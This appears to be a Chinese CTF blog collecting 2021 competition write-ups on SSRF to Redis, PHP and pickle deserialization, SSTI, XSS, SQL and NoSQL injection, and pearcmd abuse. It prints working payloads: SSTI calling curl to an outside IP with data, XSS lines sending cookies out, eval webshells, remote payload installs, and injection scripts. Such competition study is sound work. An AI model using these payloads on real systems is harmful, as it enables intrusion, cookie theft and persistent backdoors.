Posted 2021-09-23Updated 2022-02-228 minutes read (About 1155 words)

SSRF打数据库

SSRF打redis

之前学了一下打redis的几种姿势，所以现在来复现一下
几个函数学习下：

parse_url()
#解析 URL，返回其组成部分
#要解析的 URL。无效字符将使用 _ 来替换。
eg:
<?php
$url = 'http://username:password@hostname/path?arg=value#anchor';

print_r(parse_url($url));

echo parse_url($url, PHP_URL_PATH);
?>
输出:
Array
(
    [scheme] => http
    [host] => hostname
    [user] => username
    [pass] => password
    [path] => /path
    [query] => arg=value
    [fragment] => anchor
)
#注意:
parse_url() 是专门用来解析 URL 而不是 URI 的。不过为遵从 PHP 向后兼容的需要有个例外，对 file:// 协议允许三个斜线（file:///...）。

gethostbyname — 返回主机名对应的 IPv4地址。
ip2long() — 返回其长整数型的ip

2020网鼎杯SSRF打redis

再本题中，他给了一个提示：/Please visit hint.php locally.
但是他对我们访问本地做了一个waf，防止我们访问到，所以这个时候我们是需要进行绕过的，绕过本地的姿势有很多

跳转/解析到127.0.0.1：
http://127.0.0.1.nip.io/hint.php编码绕过：http://0x7f.0.0.1/hint.php特殊字符绕过
http://①②⑦.⓪.⓪.①/hint.php
http://[0:0:0:0:0:ffff:127.0.0.1]/hint.php#这个在这里可以绕过
http://127。0。0。1/flag.php
http://127.1/flag.php
http://[::]:80/flag.php
http://127.0.0.1./flag.php

接下来他给了我们关键的源码，解析一下木九十我们需要post一个文件去性进行执行，但是前面有一个exit()需要我们去绕过，这个绕过的方式我记得是用伪协议进行绕过即可

string(1342) " <?php
if($_SERVER['REMOTE_ADDR']==="127.0.0.1"){
  highlight_file(__FILE__);
}
if(isset($_POST['file'])){
  file_put_contents($_POST['file'],"<?php echo 'redispass is root';exit();".$_POST['file']);
}

这里提供了redis的密码，又是一个file_put_contents的函数，那就是ssrf打redis了，试了一下用gopher发送请求却没有回显，所以这里还是考虑一下使用主从复制RCE
今天配置了很久，决心一定要好好记录一下
首先理解一下什么是主从复制rce

1.分清谁是主谁是从
我们要让对面的服务器加载我们服务器上的恶意文件.so，那么我们是主，对面是从
2.如何让对面的服务器加载
首先需要在服务器放上这两个工具，一个是可以执行命令输出payload的工具，一个是开启服务器的工具
3.lhost和rhost
rhost即为从，lhost为主，并且这里的lhost为了能让对面的服务器加载，必须要是vps

接下来就梳理一下整体流程:将exp.so移动到这个目录
然后先在本地的ssef-redis脚本文件进行修改一下：

对以上三个地方进行修改，修改完以后，即可输出payload，
接下来启动redis服务，然后把payload再进行一次urlencode即可开打

如果要反弹shell，就把那个命令改成反弹shell的指令，在服务器上开启监听即可

2021天翼杯——easyeval

一开始是一个反序列化绕过wakeup函数的,但是他有过滤，只识别A和B两个类，所以可以在外面再嵌套一层C，改变对象数目，即可绕过

<?php
error_reporting(0);
class A{
    public $code = "eval(\$_POST['a']);";
    #public $code = 'phpinfo();';
    function __call($method,$args){
        print("yes");
        echo $this->code;
        eval($this->code);

    }
    function __wakeup(){
        $this->code = "";
    }
}

class B{
    public $a;
    function __destruct(){
        echo $this->a->a();
    }
}
class C{
    public $c;
}

$a=new A();
$b=new B();
$c=new C();
$b->a=$a;
$c->c=$b;
$d=serialize($c);
echo $d;
echo "\n";

然后就去命令执行，但是发现他phpinfo()中disable_function过滤了很多命令执行的函数=-=完全执行不了，但是看到有个配置文件，redis的配置文件，又发现file_get_contents函数没有被过滤，于是去打了一下6379端口，发现可以打通，所以感觉大概率是ssrf打redis
思路大概有以下几种:

1.备份crontab反弹shell
2.备份文件写马
3.主从复制rce
4.写无损文件
用蚁剑连接，发现tmp目录下可写文件，于是直接把redis的恶意模块exp.so放进去
然后利用蚁剑的redis插件直接进行连接数据库，密码在网站根目录下有写

然后就登录

小结

今天学习的都是SSRF通过主从复制打redis进行rce的，理解完以后发现也没啥难点–，主要是找到一篇看得懂的教程
https://blog.csdn.net/rfrder/article/details/113651337

Posted 2021-09-22Updated 2021-09-244 minutes read (About 559 words)

2021xman选拔赛

前言

复现Rctf的比赛，复现到一半发现其他都是不过10解的数，就没在看了，看了一下xman的比赛解出来的人数还挺多，于是就想说去看看

ezphp

<?php
error_reporting(0);
highlight_file(__FILE__);
 
class XMAN{
    public $class;
    public $para;
    public $check;
    public function __construct()
    {
        $this->class = "Hel";
        $this->para = "xctfer";
        echo new  $this->class ($this->para);
    }
    public function __wakeup()
    {
        $this->check = new Filter;
        if($this->check->vaild($this->para) && $this->check->vaild($this->class)) {
            echo new  $this->class ($this->para);
        }
        else
            die('what?Really?');
    }
 
}
class Hel{
    var $a;
    public function __construct($a)
    {
        $this->a = $a;
        echo ("Hello bro, I guess you are a lazy ".$this->a);
    }
}
class Filter{
 
    function vaild($code){
        $pattern = '/[!|@|#|$|%|^|&|*|=|\'|"|:|;|?]/i';
        if (preg_match($pattern, $code)){
            return false;
        }
        else
            return true;
    }
}
 
 
if(isset($_GET['xctf'])){
    unserialize($_GET['xctf']);
}
else{
    $a=new XMAN;
 
}

自己写个demo复现一下看看，反序列题，却又没给可以命令执行或者读文件的函数，那八成就是考察内置类了，定位了一下，似乎也就是这里了

先构造一下链条，看看如何到这里，再去寻找内置类：

<?php
class XMAN{
    public $class;
    public $para;
    public $check;
    public function __construct()
    {
    }
    public function __wakeup()
    {
        $this->check = new Filter;
        if($this->check->vaild($this->para) && $this->check->vaild($this->class)) {
            echo new  $this->class ($this->para);
        }
        else
            die('what?Really?');
    }

}
class Hel{

}
class Filter{

    function vaild($code){
        $pattern = '/[!|@|#|$|%|^|&|*|=|\'|"|:|;|?]/i';
        if (preg_match($pattern, $code)){
            return false;
        }
        else
            return true;
    }
}
$a=new XMAN();
$b='SplFileObject';
$c='flag.txt';
$a->class=$b;
$a->para=$c;
echo serialize($a);

根本就不用咋构造哈哈哈哈=-=，偶尔做做简单题，增强一下自信心

你的名字

听说这题是原题，发现自己buu这题也还没做，做一下：

这不是一看就大概率是模板注入了？测试一下看看是什么模板
看起来是过滤了两个中括号，一个中括号是没事的，所以payload直接打
这里的过滤规则是这样的，扫描列表并将其替换为空，然后config放在最后一个，那扫到最后一个的时候，将其替换为空，那么语句就会以正确的形式显示了，多收藏几个payload:

{% iconfigf ''.__claconfigss__.__mconfigro__[2].__subclasconfigses__()[59].__init__.func_glconfigobals.linecconfigache.oconfigs.popconfigen('curl http://110.42.133.120:9999/ -d `ls / | grep flag`;') %}1{% endiconfigf %}

{%set a='__bui'+'ltins__'%}
{%set b='__im'+'port__'%}
{%set c='o'+'s'%}
{%set d='po'+'pen'%}
{%print(lipsum['__globals__'][a][b](c)[d]('ls /')['read']())%}

Posted 2021-09-20Updated 2021-09-224 minutes read (About 616 words)

ctfshow中秋

前言

中秋节没啥事，看到学长在做这个比赛的题目，也来看看，题目挺简单的，就是第三题没见过，学习一下

第一题

0e弱类型

第二题

一个典型的控制器类定义如下：

namespace app\index\controller;

class Index 
{
    public function index()
    {
        return 'index';
    }
}

控制器类文件的实际位置是

application\index\controller\Index.php

当控制器的定义为:

namespace app\index\controller;

class Index 
{
    public function hello()
    {
        return 'hello,world!';
    }

    public function data()
    {
        return ['name'=>'thinkphp','status'=>1];
    }

}

那么想要访问不同的路由就要:

http://localhost/index.php/index/Index/hello
http://localhost/index.php/index/Index/data

回来看一下源码要访问下面的内容的路由就为

/index.php/index/index/backdoor

访问以后说

/../../'."install.lock has not been deleted";

这个文件存在，无法进行下一步，所以首先要将这个文件删除
看了一下源码有一个反序列化，随便输入一个数字，报错发现是tp5.0.24的框架，搜索了一下，有一条链子，但是是任意文件写入的链子，看了一下源码，在入口就有一个unlink函数
所以

<?php
namespace think\process\pipes;

class Windows
{   private $files=[];

    function __construct(){
        $this->files = ['/var/www/html/application/index/controller/../../install.lock'];
    }

}
echo urlencode(serialize(new Windows()));

链子长这样就行了=-=

然后就是post一个cmd参数去拿flag由于最后的flag有个正则匹配，所以要绕过，一般绕过关键字用通配符啥的都行，但是这里外面包裹了单引号，就需要使用不可打印的字符进行绕过了，这点到时候磨了很久，还有个更无语的就是，不知道为啥在网页那边用hackbar发送出去没有flag，而在burp里面才可以

第三题

<?php

// 题目说明：
// 想办法维持权限，确定无误后提交check，通过check后，才会生成flag，此前flag不存在

error_reporting(0);
highlight_file(__FILE__);

$a=$_GET['action'];

switch($a){
    case 'cmd':
        eval($_POST['cmd']);
        break;
    case 'check':
        file_get_contents("http://checker/api/check");
        break;
    default:
        die('params not validate');
}

不是很懂题目的意思，看了wp以后，推测是让php出在休眠状态不作反应，这样在check的时候权限就维持在原来的状态了

cmd=file_put_contents("/tmp/index.php","<?php eval(\$_POST[1]);?>");system("sleep 5 %26%26 php -S 0.0.0.0:80 -t /tmp/");

Posted 2021-09-19Updated 2021-09-202 minutes read (About 296 words)

关于url的一些小trick

前言

感觉最近遇到挺多ssrf的题目，然后就遇到了挺多这种url绕过的小trick，所以来复习一下

1.访问路径的后缀被写死时
可以使用?a=后缀，或者#进行绕过
eg:

以jpg结尾
http://xxxx?a=jpg
此时访问的内容即为?a前面的东西

requests 

ipv6、ipv6 zone 

requests.get(http://[::FFFF:127.0.0.1]:23334) requests.get(http://[::FFFF:127.0.0.1%abc]:23334)

host 支持  url  编码，端口号数字扩展位数

requests.get(http://%61.baidu.com:00080).text

3.python的urllib支持读取任意文件

``python # python3 # 
都相当于打开了 (http://a.baidu.com/) urllib.request.urlopen(http://[a.baidu.com]).read() 
urllib.request.urlopen(<http://[a.baidu.com]>).read() 
urllib.request.urlopen(<URL:http://[a.baidu.com]>).read()
urllib.request.urlopen('file:///etc/passwd').read()
# python2 
# 都相当于打开了 [http://a.baidu.com](http://a.baidu.com/) 
urllib.urlopen(<URL:http://[a.baidu.com]>).read() # 读文件  老东西了 
urllib.urlopen('local_file:///etc/passwd').read() 
urllib.urlopen('local-file:///etc/passwd').read() # 相当于用 ftp 打开 
urllib.urlopen('//localhost:23334') urllib.urlopen('ftp://evil:23334') # 
若服务端返回 PASV 模式的服务器与端口，python 2 不做验证直接连接
urllib.urlopen('local_file:///etc/passwd').read()
urllib.urlopen('local-file:///etc/passwd').read()

PHP:file_get_contents("file://localhost/etc/passwd");

Java:new URL('url:file:///etc/passwd')

6.ipv6三个小trick

x.1.ip6.name
0--1.ipv6-literal.net
2408-8207-1850-2a60--4c8.ipv6-literal.net

Posted 2021-09-19Updated 2021-09-193 minutes read (About 426 words)

2021长城杯

ez_python

import pickle
import base64
from flask import Flask, request
from flask import render_template,redirect,send_from_directory
import os
import requests
import random
from flask import send_file

app = Flask(__name__)

class User():
    def __init__(self,name,age):
        self.name = name
        self.age = age

def check(s):
    if b'R' in s:
        return 0
    return 1


@app.route("/")
def index():
    try:
        user = base64.b64decode(request.cookies.get('user'))
        if check(user):
            user = pickle.loads(user)
            username = user["username"]
        else:
            username = "bad,bad,hacker"
    except:
        username = "CTFer" 
    pic = '{0}.jpg'.format(random.randint(1,7))
    
    try:
        pic=request.args.get('pic')
        with open(pic, 'rb') as f:
            base64_data = base64.b64encode(f.read())
            p = base64_data.decode()
    except:
        pic='{0}.jpg'.format(random.randint(1,7))
        with open(pic, 'rb') as f:
            base64_data = base64.b64encode(f.read())
            p = base64_data.decode()

    return render_template('index.html', uname=username, pic=p )


if __name__ == "__main__":
    app.run('0.0.0.0',port=8888)

定位一下关键函数pickle

考点就呼之欲出了pickle反序列化绕过r字符

user = pickle.loads(user)

有现成的链子可以直接打

import requests
import pickle
import base64
#e = 'ls / -a'
e = 'cat /flagggggggggggggaaa'
s = pickle.dumps(e)
# print(s)
payload = b'c__main__\nUser\n)\x81}(V__setstate__\ncos\nsystem\nubV' + \
    e.encode()+b' > /tmp/1.txt\nb.'
response = requests.get("http://eci-2zedqu5w4d2328dulcrt.cloudeci1.ichunqiu.com:8888/?pic=/tmp/1.txt",
cookies=dict(
    user=base64.b64encode(payload).decode()))
print(response.text)
for l in response.content.decode().split("\n"):
    if "base64" in l:
        l = l.split("\"")[1].split(",")[1]
        print(base64.b64decode(l).decode())

java_url

java项目下都有一个配置文件可以下载

/download?filename=../../../../WEB-INF/web.xml

然后就可以拿到很多路由
接下来下载源码

/download?filename=../../../../WEB-INF/classes/com/test2/aaa1/testURL.class

/download?filename=../../../../WEB-INF/classes/com/test2/aaa1/download.class

在审计源码的时候可以看到

String pri = tartget_url.substring(0, tartget_url.indexOf(":"));
if (pri.matches("(?i)file|(?i)gopher|(?i)data")) {

第一个冒号前不可以是以下三种协议，所以要找一个放在file协议前面，却又不会报错的

url:file:///etc/passwd
url:file:///
url:file:///flag

这样就可以了

Posted 2021-09-18Updated 2021-09-18a minute read (About 190 words)

跨站脚本攻击

xss打cookie姿势总结

xss攻击是客户端攻击

xss是什么

将任意javascript代码插入到其他web用户页面执行以达到攻击目的
当用户里浏览改页时，恶意代码将会被执行，用户的信息等将被窃取。

容易产生xss的地方

1.数据交互的地方：get、post、cookies、headers
2数据输出的地方：

ctf中的xss

<script>windows('http://127.0.0.1:1234?q='+btoa(document.cookie))</script>
<script>windows.location.href='http://127.0.0.1:1234?q='+btoa(document.cookie)</script>

<script>
var img=document.createElement('img');
img.src='http://127.0.0.1:1234/?q='+btoa(document.cookie);
document.body.append(img)
</script>

将以上内容插入含有xss漏洞的页面中，其他用户访问这些页面，你在本地监听1234端口，即可获得他们的一些cookie信息

Posted 2021-09-17Updated 2021-09-269 minutes read (About 1402 words)

2021第五空间大赛

前言

比赛的时候一直纠结那题sql注入，后面赛后复现其他题目悔不当初，题目都不会太难吧

pklovecloud

<?php  
include 'flag.php';
class pkshow 
{  
    function echo_name()     
    {          
        return "Pk very safe^.^";      
    }  
} 

class acp 
{   
    protected $cinder;  
    public $neutron;
    public $nova;
    function __construct() 
    {      
        $this->cinder = new pkshow;
    }  
    function __toString()      
    {          
        if (isset($this->cinder))  
            return $this->cinder->echo_name();      
    }  
}  

class ace
{    
    public $filename;     
    public $openstack;
    public $docker; 
    function echo_name()      
    {   
        $this->openstack = unserialize($this->docker);
        $this->openstack->neutron = $heat;
        if($this->openstack->neutron === $this->openstack->nova)
        {
        $file = "./{$this->filename}";
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }  
            else 
            { 
                return "keystone lost~"; 
            }    
        }
    }  
}  

if (isset($_GET['pks']))  
{
    $logData = unserialize($_GET['pks']);
    echo $logData; 
} 
else 
{ 
    highlight_file(__file__); 
}
?>

构造一下链条

<?php

class acp
{
    public $cinder;
    public $neutron="1";
    public $nova="1";
    function __construct()
    {
        $this->cinder = new pkshow;
    }
    function __toString()
    {
        if (isset($this->cinder))
            return $this->cinder->echo_name();
    }
}

class ace
{
    public $filename;
    public $openstack;
    public $docker;
    function echo_name()
    {
        $this->openstack = unserialize($this->docker);
        $this->openstack->neutron = $heat;
        if($this->openstack->neutron === $this->openstack->nova)
        {
            $file = "./{$this->filename}";
            if (file_get_contents($file))
            {
                return file_get_contents($file);
            }
            else
            {
                return "keystone lost~";
            }
        }
    }
}
$a=new acp();
$b=new ace();
$b->filename="flag.php";
$a->cinder=$b;
echo urlencode(serialize($a));

O%3A3%3A"acp"%3A3%3A%7Bs%3A6%3A"cinder"%3BO%3A3%3A"ace"%3A3%3A%7Bs%3A8%3A"filename"%3Bs%3A8%3A"flag.php"%3Bs%3A9%3A"openstack"%3BN%3Bs%3A6%3A"docker"%3BN%3B%7Ds%3A7%3A"neutron"%3Bs%3A1%3A"1"%3Bs%3A4%3A"nova"%3Bs%3A1%3A"1"%3B%7D

WebFTP

目录扫描，拿到源码，然后使用index.php里面的文件进行登录，发现报错，不知道有没有用，先收集一下

Warning: error_log(/var/www/html/Data/Logs/21_09_17.log): failed to open stream: No such file or directory in /var/www/html/Inc/Functions.php on line 229

发现都没啥用，但是发现可以下载配置文件，于是就对照拿到的源码去翻翻看

http://114.115.185.167:32770/Readme/mytz.php?act=phpinfo

发现可以执行phpinfo，接下来就拿到flag了

EasyCleanup

 <?php

if(!isset($_GET['mode'])){
    highlight_file(__file__);
}else if($_GET['mode'] == "eval"){
    $shell = $_GET['shell'] ?? 'phpinfo();';
    if(strlen($shell) > 15 | filter($shell) | checkNums($shell)) exit("hacker");
    eval($shell);
}


if(isset($_GET['file'])){
    if(strlen($_GET['file']) > 15 | filter($_GET['file'])) exit("hacker");
    include $_GET['file'];
}


function filter($var): bool{
    $banned = ["while", "for", "\$_", "include", "env", "require", "?", ":", "^", "+", "-", "%", "*", "`"];

    foreach($banned as $ban){
        if(strstr($var, $ban)) return True;
    }

    return False;
}

function checkNums($var): bool{
    $alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $cnt = 0;
    for($i = 0; $i < strlen($alphanum); $i++){
        for($j = 0; $j < strlen($var); $j++){
            if($var[$j] == $alphanum[$i]){
                $cnt += 1;
                if($cnt > 8) return True;
            }
        }
    }
    return False;
}

?>

查看一下phpinfo()内容

?mode=eval&shell=phpinfo();

刚刚注意到有文件包含操作,发现session这里开启了，

然后写脚本包含以下就出来了~

import requests
import threading
sess_id="1"
s=requests.session()
url="http://114.115.134.72:32770/"
def session_upload():
    while True:
        res= s.post(
            url=f"{url}/?page=/tmp/session/sess_{sess_id}",
            data={
                'PHP_SESSION_UPLOAD_PROGRESS': "<?php system('ls');?>"
            },
            files={"file": ('xxx.txt', open("shell.txt", "r"))},
            cookies={'PHPSESSID':sess_id}
        )
for i in range(100):
    thread=threading.Thread(target=session_upload)
    thread.start()

yet_another_mysql_injection

最后一题，一开始看了一下源码，要登录

<?php
include_once("lib.php");
function alertMes($mes,$url){
    die("<script>alert('{$mes}');location.href='{$url}';</script>");
}

function checkSql($s) {
    if(preg_match("/regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\\\$|0x|sleep|\ /i",$s)){
        alertMes('hacker', 'index.php');
    }
}

if (isset($_POST['username']) && $_POST['username'] != '' && isset($_POST['password']) && $_POST['password'] != '') {
    $username=$_POST['username'];
    $password=$_POST['password'];
    if ($username !== 'admin') {
        alertMes('only admin can login', 'index.php');
    }
    checkSql($password);
    $sql="SELECT password FROM users WHERE username='admin' and password='$password';";
    $user_result=mysqli_query($con,$sql);
    $row = mysqli_fetch_array($user_result);
    if (!$row) {
        alertMes("something wrong",'index.php');
    }
    if ($row['password'] === $password) {
    die($FLAG);
    } else {
    alertMes("wrong password",'index.php');
  }
}

if(isset($_GET['source'])){
  show_source(__FILE__);
  die;
}
?>

一开始看了一下以为是要登录，所以就写了个脚本盲注

import requests
import time
import binascii
url="http://114.115.143.25:32770"
s=requests.session()
def hex_tran(s):
    return hex(s).replace("0x", "")
def tran_str(g):
    tran_tmp=""
    g = binascii.unhexlify(g)
    print(g.decode('utf-8'))
    tran_tmp=g
    print(tran_tmp[::-1])
    return tran_tmp


def sql_injection(payload:str):
    wd_tr=""
    for j in range(1,100):
        for i in range(32,128):
            #payload_fina=f"1'or/**/case/**/(select/**/hex(right(({payload}),{j}))/**/in/**/('{hex_tran(i)+wd_tr}'))/**/when/**/1/**/then/**/benchmark(100000,sha1(sha1(sha1(sha1(sha1(sha1(sha1('HWG'))))))))/**/else/**/1/**/end#"
            payload_fina =f"1'or/**/case/**/(select/**/ascii(mid(({payload}),{j},1)))/**/when/**/({i})/**/then/**/benchmark(1000000,sha1(sha1(sha1(sha1(sha1(sha1(sha1(sha1(sha1(sha1('HWG')))))))))))/**/else/**/1/**/end#"
            data={
                "username":"admin",
                "password":payload_fina
            }
            print(data)
            times=time.time()
            r=s.post(url,data=data).text
            print(r)
            if time.time()-times >= 7:
                wd_tr+=chr(i)
                print(wd_tr)
                break
            if i==127:
                print(wd_tr)
                exit(0)




if __name__ =="__main__":
    payload="version()"
    #payload="database()"
    #payload="select group_concat(table_name) from information_schema.tables where table_schema in (select database())".replace(" ","/**/")
    #payload="select group_concat(table_name) from sys.schema_table_statistics".replace(" ","/**/")
    #payload="select group_concat(a.2) from (select 1,2,3 union select * from `users`)a".replace(" ","/**/")
    #payload="select group_concat(column_name) from information_schema.columns where table_name in ('Fl49ish3re')".replace(" ","/**/")
    #payload="select group_concat(f1aG123) from Fl49ish3re".replace(" ","/**/")
    sql_injection(payload)

注出来以后，发现数据库是空的，卡了很久，后来才想到，数据库为空，又要让我们输入的内容和输出的内容一致的话，就需要自己构造一下

'/**/UNION/**/SELECT/**/REPLACE(REPLACE('"/**/UNION/**/SELECT/**/REPLACE(REPLACE("^",unhex(hex(34)),unhex(hex(39))),unhex(hex(94)),"^")#',unhex(hex(34)),unhex(hex(39))),unhex(hex(94)),'"/**/UNION/**/SELECT/**/REPLACE(REPLACE("^",unhex(hex(34)),unhex(hex(39))),unhex(hex(94)),"^")#')#

大师傅跟我说，遇到这种题目，其实可以这样尝试一波：
在后面注入password like “%” 因为如果数据库有数据，那么任何数据like %都是满足的，如果依然返回false，说明数据库是空的
当然首先是你的用户名是正确的

png转换器

看了一下框架是ruby，这个时候应该用排除法，肯定不是文件上传，因为无法访问到图片，接下就是convert png file的框，这里又有什么情况可能呢？
ssti注入，命令执行，似乎也无了，ssti注入没地方回显，所以肯定也不是，这里就学到一个新姿势

file=|bash -c "$(echo 'bHMgLw==' | base64 -d)" #.png
cat /FLA9_KywXAv78LbopbpBDuWsm
file=|bash -c "$(echo 'Y2F0IC9GTEE5X0t5d1hBdjc4TGJvcGJwQkR1V3Nt' | base64 -d)" #.png

这个就是ruby命令执行的姿势了，将命令执行的结果以base64的方式存储在png中

Posted 2021-09-15Updated 2022-08-047 minutes read (About 1078 words)

2021Rctf

当时在打羊城杯，打完以后就很累就没怎么打rctf，不过题目也是我没见过的trick就是了，这里记录一下

easyphp

分号前段认证绕过

原理

1.httpservletrequest中url解析函数

几种解析方法：

request.getRequestURL()：返回全路径；request.getRequestURI()：返回除去Host（域名或IP）部分的路径；request.getContextPath()：返回工程名部分，若是工程映射为/，则返回为空；request.getServletPath()：返回除去Host和工程名部分的路径；request.getPathInfo()：仅返回传递到Servlet的路径，若是没有传递额外的路径信息，则此返回Null；

当后台程序使用getRequestURI()或getRequestURL()函数来解析用户请求的URL时，若URL中包含了一些特殊符号，则可能会形成访问限制绕过的安全风险，其中分号；就是其一。

2.对url特殊字符的处理

1）分号
在url中遇到分号，会将;xxx/中的分号与斜杠之间的字符串以及分号自己都去掉
2）斜杠/
判断是否有连续的/，存在的话则循环删除掉多余的/
3）./和../
将/./删除掉，将/../进行跨目录拼接处理

总结：

/;xxx/实现分割目录/..;/实现跨目录，经常使用在../被禁用的场景下;.css或;.js等利用白名单绕过认证鉴权

payload：

加/绕过：http://localhost:8080//urltest/info/secret.jsp
跨目录：http://localhost:8080/urltest/anything/../info/secret.jsp       或http://localhost:8080/urltest/anything/..;/info/secret.jsp
./绕过：http://localhost:8080/urltest/./info/secret.jsp
;绕过：http://localhost:8080/urltest/;anything/info/secret.jsp

题目解析

看了一下大神们的解释，才发现这题有多麻烦，核心的考点是urldecode和urlencode的交错使用，
1.所有以/admin打头的请求只要不是localhost发起的请求，就会被dump掉，但是很巧的是，后面有一个匹配是匹配最后/进行url去访问
所以就有了/aa/admin
2.为什么是%3flogin而不是?login，首先需要url中有login，不然的也会被dump掉，但是有了login又有了?login就不会被当做是url的一部分，而是一个string，当这里urlencode以后，就会被当成是url的一部分了，并且后面还有decode解码回来，所以不会影响访问
3.为什么需要二次编码？因为出题人就是这样设置的=

public function route(Request $request) {
    $url_decoded = urldecode( $request->url );
    while ($route = $this->current()) {
        if ($route !== false && $route->matchMethod($request->method) && $route->matchUrl($url_decoded, $this->case_sensitive)) {
            return $route;
        }
        $this->next();
    }

    return false;
}

   if (preg_match('#^'.$regex.'(?:\?.*)?$#'.(($case_sensitive) ? '' : 'i'), $url, $matches)) {
        foreach ($ids as $k => $v) {
            $this->params[$k] = (array_key_exists($k, $matches)) ? urldecode($matches[$k]) : null;
        }

        $this->regex = $regex;

        return true;
    }

    return false;
}

candyshop

随便注册了一个账号登录，发现后面需要用户是active才有进一步操作

所以还是要先注出这个密码，根据后面的一系列跳转，发现是一个nosql数据库

import requests
chars='0123456789abcdef'
ans=''
url="http://123.60.21.23:23333/user/login"
s=requests.session()
for pos in range(1,100):
    for ch in chars:
        data={'username':'rabbit','password[$regex]':'^'+ans+ch+'.*$'}
        res=s.post(url=url,data=data)
        #print(data)
        #print(res.text)
        if 'Bad' in res.text:
            ans +=ch
            break
        if ch=='f':
            exit(0)
    print(pos,ans)

跑出密码，继续追踪登录的路由:

发现这里有一个pug的模板渲染，且内容可控,pug渲染内容还有格式要求，这里要注意一下缩进，由于有缩进，所以其实前面的内容如果不是1之类的，可能就不行了，会导致出错之类的

username=1&candyname=1&address='+flag=global.process.mainModule.constructor._load('child_process').execSync("cat+/flag").toString()+a='

VerySafe

啥也没有，抓包的时候看到一个

Server: Caddy

找了很久的文章都没看到相关的介绍==，然后才看到有人说了一下caddy的某个目录穿越漏洞,然后
测试还发现Caddy存在与Nginx一样的，使用cgi模式执行php时，a.jpg/.php将a.jpg当作php解析的问题，但是仍然受security.limit_extensions限制——相当于存在文件包含

/../../../../usr/local/lib/php/pearcmd.php?f=pearcmd&+install+-R+/tmp/+http://110.42.133.xxx/pear.php
/../../../../tmp/tmp/pear/download/pear.php

Posted 2021-09-13Updated 2022-08-045 minutes read (About 821 words)

使用pear命令直接写马

register_argc_argv

1.首先了解到这个参数默认是ON的
2.当这个参数开启的时候，php会注册argc和argc这两个全局变量。

pear

Pear 是 PHP 扩展与应用库（the PHP Extension and Application Repository）的缩写，是一个 PHP 扩展及应用的一个代码仓库。Pear 仓库代码是以包（package）分区，每一个 Pear package 都是一个独立的项目有着自己独立的开发团队、版本控制、文档和其他包的依赖关系信息。Pear package 以 phar、tar 或 zip 发布。

因为pear是包管理器，所以存在下载和安装包功能
在pear命令的源码下，可以发现:

#!/bin/sh

# first find which PHP binary to use
if test "x$PHP_PEAR_PHP_BIN" != "x"; then
  PHP="$PHP_PEAR_PHP_BIN"
else
  if test "/usr/local/bin/php" = '@'php_bin'@'; then
    PHP=php
  else
    PHP="/usr/local/bin/php"
  fi
fi

# then look for the right pear include dir
if test "x$PHP_PEAR_INSTALL_DIR" != "x"; then
  INCDIR=$PHP_PEAR_INSTALL_DIR
  INCARG="-d include_path=$PHP_PEAR_INSTALL_DIR"
else
  if test "/usr/local/lib/php" = '@'php_dir'@'; then
    INCDIR=`dirname $0`
    INCARG=""
  else
    INCDIR="/usr/local/lib/php"
    INCARG="-d include_path=/usr/local/lib/php"
  fi
fi

exec $PHP -C -q $INCARG -d date.timezone=UTC -d output_buffering=1 -d variables_order=EGPCS -d open_basedir="" -d safe_mode=0 -d register_argc_argv="On" -d auto_prepend_file="" -d auto_append_file="" $INCDIR/pearcmd.php "$@"

，可以看到后面调用了argv的值，是从包含的另一个文件中来的

require_once 'Console/Getopt.php';
/* ... */
$argv = Console_Getopt::readPHPArgv();

在console/Getopt.php有如下实现方法:

public static function readPHPArgv()
    {
        global $argv;
        if (!is_array($argv)) {
            if (!@is_array($_SERVER['argv'])) {
                if (!@is_array($GLOBALS['HTTP_SERVER_VARS']['argv'])) {
                    $msg = "Could not read cmd args (register_argc_argv=Off?)";
                    return PEAR::raiseError("Console_Getopt: " . $msg);
                }
                return $GLOBALS['HTTP_SERVER_VARS']['argv'];
            }
            return $_SERVER['argv'];
        }
        return $argv;
    }

可以看到获取$argv的方式是global $argv --> $_SERVER['argv'] --> $GLOBALS['HTTP_SERVER_VARS']['argv']

利用链

当我们包含pearcmd.php的时候，相当于包含了这个php文件里面的所有变量，由于argv变量我们可控，那么我就可以通过pear命令来getshell了

pear命令任意文件下载

首先要cd到/usr/lib/php
然后用

pear dowload http://xxx.xx.xx.xx/pear.php

即可下载到当前目录下
如果/var/www/html目录可写:

pear install -R /var/www/html http:/xxxxxx/pear.php

如何使用argv和argc传值进行peargetshell

阅读底层c代码

PHPAPI void php_build_argv(const char *s, zval *track_vars_array)
{
zval arr, argc, tmp;
int count = 0;
if (!(SG(request_info).argc || track_vars_array)) {
return;
}
array_init(&arr);
/* Prepare argv */
if (SG(request_info).argc) { /* are we in cli sapi? */
int i;
for (i = 0; i < SG(request_info).argc; i++) {
ZVAL_STRING(&tmp, SG(request_info).argv[i]);
if (zend_hash_next_index_insert(Z_ARRVAL(arr), &tmp) == NULL) {
zend_string_efree(Z_STR(tmp));
}
}
} else if (s && *s) {
while (1) {
const char *space = strchr(s, '+');
/* auto-type */
ZVAL_STRINGL(&tmp, s, space ? space - s : strlen(s));
count++;
if (zend_hash_next_index_insert(Z_ARRVAL(arr), &tmp) == NULL) {
zend_string_efree(Z_STR(tmp));
}
if (!space) {
break;
} s
= space + 1;
}
}

可以知道argv通过query_string取值，并通过+作为分隔符

// web目录可写
- http://ip:port/include.php?f=pearcmd&+install+-R+/var/www/html+http://ip:port/evil.php
- http://ip:port/tmp/pear/download/evil.php
// tmp目录可写
- http://ip:port/include.php?f=pearcmd&+install+-R+/tmp+http://ip:port/evil.php
- http://ip:port/include.php?f=/tmp/pear/download/evil

rctf的payload

/../../../../usr/local/lib/php/pearcmd.php?f=pearcmd&+install+-R+/tmp/+http://110.42.133.xxxx/pear.php
/../../../../tmp/tmp/pear/download/pear.php

<script language='php'>eval($_POST['a']);</script>

<script language='php'> eval($_POST['a']);</script>

Posted 2021-09-12Updated 2021-09-1322 minutes read (About 3284 words)

羊城杯wp

Only 4

有个关键文件serialize.php文件没扫到是真的无语，一直在那里读文件，有个配置文件

?gwht=php://filter/read=convert.base64-encode/resource=/etc/php5/apache2/php.ini

读完以后发现session_upload_progress默认是开启的，还提高了session路径，所以就使用条件竞争去上传了，但是不知道为啥，我这里一直反弹shell没成功。。。但是学长们成功了~

有一个serialize.php文件，预期解说是扫描出来的，这波是真的难受啊，真的没扫出来我吐了，这次复现就决定复现一下这个预期解了
